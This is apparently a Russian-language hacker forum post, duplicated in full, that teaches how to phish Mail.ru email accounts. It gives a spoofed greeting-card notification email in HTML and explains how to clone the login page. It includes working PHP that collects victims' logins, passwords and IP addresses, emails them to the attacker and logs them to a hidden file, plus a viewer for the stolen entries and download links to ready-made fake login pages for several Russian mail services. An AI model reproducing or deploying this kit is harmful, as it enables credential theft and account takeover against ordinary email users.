misterio
15.08.2007, 22:45
Итак, что нам нужно:
1. Хостинг где-нибудь(например holm.ru)
2. Прямые руки(в том числе и finger.dll) ;)
3. И ящик жертвы
1 Этап - Теория.
Как же оно работает:
Просто при заходе на сайт вы пишите своё имя и пароль в системе, а как мы это отправим смотрите дальше.
2 Этап - Отправка письма.
Значит можем дать просто ссылку на сайт или так отправить:
Нажимаем "Написать письмо", пишем кому, в поле "Тема" вводим "Вам пришла открытка", а сообщении пишем:
<table class=readlet cellpadding=0 cellspacing=0 border=0 width="100%"><tr>
<td>
<div id=let_body><base href="http://win.mail.ru/cgi-bin/readmsg"><table cellspacing=0 cellpadding=5><tr valign=top>
<td><a href="http://cards.mail.ru" target="_blank"><img src="http://images.cards.mail.ru/2006/avatar.gif" width=90 height=90 border=0></a></td>
<td><font color="#333333" face="Arial" size="2">
Здравствуйте, на Ваше имя отправлена открытка.<br>
Отправитель открытки: Открытки@Mail.Ru <cards@cards.mail.ru></br><br>
Открытку Вы можете посмотреть в течение 90 дней по ссылке<br>
<a href="ССЫЛКА НА ВАШ САЙТ" target="_self"><font color=#0857A6>http://cards.mail.ru/card.html?cd=7b5fd891edc9120c2cd5c7abe302a1cc</font></a><br>
Нажмите на неё или скопируйте ссылку в адресную строку интернет-браузера.<br><br>
<br>
<hr align="left" color="silver" size="1" width="100%">
Чтобы своевременно узнавать о ближайших праздниках, именинниках и конкурсах,<br>
<a href="http://content.mail.ru/pages/p_782.html" target="_blank" _base_href="http://win.mail.ru/cgi-bin/readmsg"> подпишитесь на рассылку</a>.
<br><br>
<a href="http://cards.mail.ru/" target="_blank" _base_href="http://win.mail.ru/cgi-bin/readmsg"><font color="#0857a6">Открытки@Mail.Ru</font></a> - открытки на все случаи жизни!<br><br><br>
Потом жмём "расширанный режим" и жмём отправить...
Жертва прочитаем письмо, пройдёт по ссылке и напишет там свой пароль(Проверено - 99%)
3 Этап - Создание Собственного Фейка
Итак, рассмотрим способ создания фейка. Заходите на панель авторизации пользователя и нажимаете "Сохранить как" сохраняете её и потом переимёновываете в "index.php".
Затем создаем файл "base.php" и записываем туда следующее:
<? print "<center><h1>Stop!!!! Access Denide!</h1></center>"; exit; ?>
Это чтобы никто не смог посмотреть базу.
Создаете файл log.php и пихаете туда:
<?PHP
$Login = $_POST['login']; //Логин
$Domain = $_POST['domain'];
$Pass = $_POST['password']; // Пароль
$ip = $_SERVER["REMOTE_ADDR"]; // IP Жертвы
$Data = date("d-m-y H:i:s", time()); // Дата и время
$text = "[$Data] IP:$ip Мыло:$Login@$Domain Пасс:$Pass";
$to = "ВАШЕ МЫЛО"; // кому присылаем данные ( E-mail адресс )
$sub = " Пароль от ящика: $Login@$Domain"; // тема письма
mail($to,$sub,$text); // Отсылаем сообщение о пополнении базы на E-mail
$filelog = fopen("base.php","a+"); //открываем файл базы
fwrite($filelog,"\n $text \n"); //записываем всё
fclose($filelog); //закрываем
echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://cards.mail.ru/card.html?cdu=8fe03702cc03252da65651e35e098d9d'></head></html>"; // куда пошлем пользователя после того как он ввел данные!
?>
Тут всякие настройки.
И последнее, создаём файл seebase.php и пихаем туда:
<html>
<head>
<title>Give E-mail</title>
</head>
<body>
<form method="POST">
Login: <input type="text" name="login">
<br>
<input type="submit" value="OK">
</form>
<?php
if (isset($_POST['login']))
if ($_POST['login'] != '')
{
$login = $_POST['login'];
echo $_POST['login'].'<BR>';
$fp = fopen('base.php', 'r');// Имя базы
while (!feof ($fp)) {
$buffer = fgets($fp);
if (strpos($buffer,$login) !== false)
{
echo $buffer.'<BR>';
break;
}
}
fclose($fp);
}
?>
</body>
</html>
Это чтобы видеть базу через вебку, но лучше копировать с ftp base.php, чтобы лишние глаза не смогли посмотреть базу через seebase.php
Впринципе всё с этапом 3!
P.S. Скоро напишу как создавать фейки для других почтовых сервисов
P.S.S. Задавайте вопросы тут...
Готовые Фейки:
Mail.ru Фейк:
Ссылка:http://slil.ru/24741643
Пасс:feikmailru
Все фейки(Mail.ru;Rambler;UcoZ и Yandex.ru)
Ссылка: http://slil.ru/24745423
Пасс: allfeiks
Видео по использованию Фейка:
Ссылка: http://slil.ru/24745566
Пасс: videofeik
1. Хостинг где-нибудь(например holm.ru)
2. Прямые руки(в том числе и finger.dll) ;)
3. И ящик жертвы
1 Этап - Теория.
Как же оно работает:
Просто при заходе на сайт вы пишите своё имя и пароль в системе, а как мы это отправим смотрите дальше.
2 Этап - Отправка письма.
Значит можем дать просто ссылку на сайт или так отправить:
Нажимаем "Написать письмо", пишем кому, в поле "Тема" вводим "Вам пришла открытка", а сообщении пишем:
<table class=readlet cellpadding=0 cellspacing=0 border=0 width="100%"><tr>
<td>
<div id=let_body><base href="http://win.mail.ru/cgi-bin/readmsg"><table cellspacing=0 cellpadding=5><tr valign=top>
<td><a href="http://cards.mail.ru" target="_blank"><img src="http://images.cards.mail.ru/2006/avatar.gif" width=90 height=90 border=0></a></td>
<td><font color="#333333" face="Arial" size="2">
Здравствуйте, на Ваше имя отправлена открытка.<br>
Отправитель открытки: Открытки@Mail.Ru <cards@cards.mail.ru></br><br>
Открытку Вы можете посмотреть в течение 90 дней по ссылке<br>
<a href="ССЫЛКА НА ВАШ САЙТ" target="_self"><font color=#0857A6>http://cards.mail.ru/card.html?cd=7b5fd891edc9120c2cd5c7abe302a1cc</font></a><br>
Нажмите на неё или скопируйте ссылку в адресную строку интернет-браузера.<br><br>
<br>
<hr align="left" color="silver" size="1" width="100%">
Чтобы своевременно узнавать о ближайших праздниках, именинниках и конкурсах,<br>
<a href="http://content.mail.ru/pages/p_782.html" target="_blank" _base_href="http://win.mail.ru/cgi-bin/readmsg"> подпишитесь на рассылку</a>.
<br><br>
<a href="http://cards.mail.ru/" target="_blank" _base_href="http://win.mail.ru/cgi-bin/readmsg"><font color="#0857a6">Открытки@Mail.Ru</font></a> - открытки на все случаи жизни!<br><br><br>
Потом жмём "расширанный режим" и жмём отправить...
Жертва прочитаем письмо, пройдёт по ссылке и напишет там свой пароль(Проверено - 99%)
3 Этап - Создание Собственного Фейка
Итак, рассмотрим способ создания фейка. Заходите на панель авторизации пользователя и нажимаете "Сохранить как" сохраняете её и потом переимёновываете в "index.php".
Затем создаем файл "base.php" и записываем туда следующее:
<? print "<center><h1>Stop!!!! Access Denide!</h1></center>"; exit; ?>
Это чтобы никто не смог посмотреть базу.
Создаете файл log.php и пихаете туда:
<?PHP
$Login = $_POST['login']; //Логин
$Domain = $_POST['domain'];
$Pass = $_POST['password']; // Пароль
$ip = $_SERVER["REMOTE_ADDR"]; // IP Жертвы
$Data = date("d-m-y H:i:s", time()); // Дата и время
$text = "[$Data] IP:$ip Мыло:$Login@$Domain Пасс:$Pass";
$to = "ВАШЕ МЫЛО"; // кому присылаем данные ( E-mail адресс )
$sub = " Пароль от ящика: $Login@$Domain"; // тема письма
mail($to,$sub,$text); // Отсылаем сообщение о пополнении базы на E-mail
$filelog = fopen("base.php","a+"); //открываем файл базы
fwrite($filelog,"\n $text \n"); //записываем всё
fclose($filelog); //закрываем
echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://cards.mail.ru/card.html?cdu=8fe03702cc03252da65651e35e098d9d'></head></html>"; // куда пошлем пользователя после того как он ввел данные!
?>
Тут всякие настройки.
И последнее, создаём файл seebase.php и пихаем туда:
<html>
<head>
<title>Give E-mail</title>
</head>
<body>
<form method="POST">
Login: <input type="text" name="login">
<br>
<input type="submit" value="OK">
</form>
<?php
if (isset($_POST['login']))
if ($_POST['login'] != '')
{
$login = $_POST['login'];
echo $_POST['login'].'<BR>';
$fp = fopen('base.php', 'r');// Имя базы
while (!feof ($fp)) {
$buffer = fgets($fp);
if (strpos($buffer,$login) !== false)
{
echo $buffer.'<BR>';
break;
}
}
fclose($fp);
}
?>
</body>
</html>
Это чтобы видеть базу через вебку, но лучше копировать с ftp base.php, чтобы лишние глаза не смогли посмотреть базу через seebase.php
Впринципе всё с этапом 3!
P.S. Скоро напишу как создавать фейки для других почтовых сервисов
P.S.S. Задавайте вопросы тут...
Готовые Фейки:
Mail.ru Фейк:
Ссылка:http://slil.ru/24741643
Пасс:feikmailru
Все фейки(Mail.ru;Rambler;UcoZ и Yandex.ru)
Ссылка: http://slil.ru/24745423
Пасс: allfeiks
Видео по использованию Фейка:
Ссылка: http://slil.ru/24745566
Пасс: videofeik